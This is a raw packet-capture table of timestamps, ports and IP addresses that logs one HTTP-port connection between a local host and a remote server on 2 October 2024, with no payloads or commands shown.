Oct 2, 2024 18:19:28.078893900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169235945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169262886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169277906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169295073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169303894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169349909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169394016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169581890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169598103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169631958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169631958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169648886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169656992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169662952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169678926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169681072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169694901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169698954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169724941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169764996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.169955969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169971943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169986963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.169995070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170001030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170015097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170022964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170031071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170048952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170053959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170068979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170084953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170094013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170099020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170114994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170120001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170130014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170145988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170147896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170162916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170175076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170202971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170516014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170562983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170726061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170741081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170763969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170778990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170783997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170792103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170805931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170820951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170824051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170836926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170851946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170865059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170870066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170885086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170892000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170900106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170914888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170917034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170929909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170948029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170954943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.170963049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170979977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.170994043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.171000004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.171010017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.171025991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.171030045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.171049118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.171077967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172086954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172102928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172117949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172133923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172146082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172200918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172230959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172246933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172261000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172276020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172280073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172291040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172307014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172312975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172322035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172353983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172383070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172388077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172404051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172418118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172427893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172434092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172447920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172454119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172461987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172477007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172492027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172493935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172524929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172545910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.172564983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.172611952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173176050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173198938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173213959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173221111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173228979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173235893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173244953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173259974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173265934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173275948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173288107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173290968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173304081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173320055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173327923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173335075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173350096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173357010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173365116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173379898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173393965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173394918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173409939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173425913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173434019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173441887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173456907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173456907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173472881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173489094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173494101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173504114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173537016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173573017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173748970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173763990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173785925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173800945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173805952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173815012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173830986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173841000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173845053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173861027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173861027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173876047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173891068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173898935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173904896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173921108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173937082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173944950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173952103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173965931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173979044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.173980951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.173995972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174005032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174011946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174026012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174032927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174041986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174057007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174067974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174118042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174613953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174629927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174643993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174658060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174659014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174674034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174679995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174688101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174700975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174715996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174724102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174731970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174746037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174751043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174763918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174782038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174787045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174801111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174803972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174814939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174829006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174835920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174844980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174860001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174875975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174900055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.174968004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174983978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.174998045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175010920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175014019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175029039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175033092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175061941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175096989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175339937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175355911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175371885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175398111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175407887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175424099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175425053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175455093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175474882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175487995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175491095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175506115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175518036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175520897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175537109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175543070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175569057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175602913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175791979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175807953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175822020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175837040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175838947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175852060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175859928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175868034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175883055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175898075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175904989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175913095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175929070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175935984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175944090 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175956964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175960064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175975084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.175985098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.175990105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.176004887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.176019907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.176059961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.176150084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.176193953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.176743984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.176842928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.183990955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184015036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184029102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184041023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184046030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184061050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184067965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184082031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184108019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184124947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184130907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184140921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184144974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184158087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184173107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184179068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184185028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184191942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184210062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184217930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184217930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184231997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184245110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184247017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184263945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184279919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184282064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184287071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184297085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184319973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184340000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184351921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184355974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184366941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184384108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184397936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184407949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184422016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184453011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184453011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184475899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184490919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184499025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184505939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184521914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184524059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184545994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184559107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184564114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184587955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184623957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184623957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184813023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184851885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184868097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184875965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184883118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184900045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184922934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.184926033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.184967041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185050964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185092926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185096025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185107946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185127974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185134888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185143948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185165882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185173035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185182095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185197115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185213089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185219049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185241938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185251951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185257912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185275078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185277939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185298920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185311079 CEST	80	49737	185.215.113.37	192.168.2.4
